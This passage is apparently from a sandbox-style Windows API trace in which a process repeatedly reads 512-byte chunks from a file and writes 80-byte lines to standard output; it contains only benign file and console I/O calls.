lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType 
(hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.376] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.376] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, 
lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.377] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.377] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: 
hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.378] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.378] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 
[0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.379] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.379] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, 
lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.380] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.380] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.380] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 
0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] GetFileType (hFile=0x50) returned 0x1 [0214.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.381] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.381] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.382] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) 
returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.382] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.382] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.382] GetFileType (hFile=0x50) returned 0x1 [0214.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.383] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.383] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.383] GetFileType (hFile=0x50) returned 0x1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: 
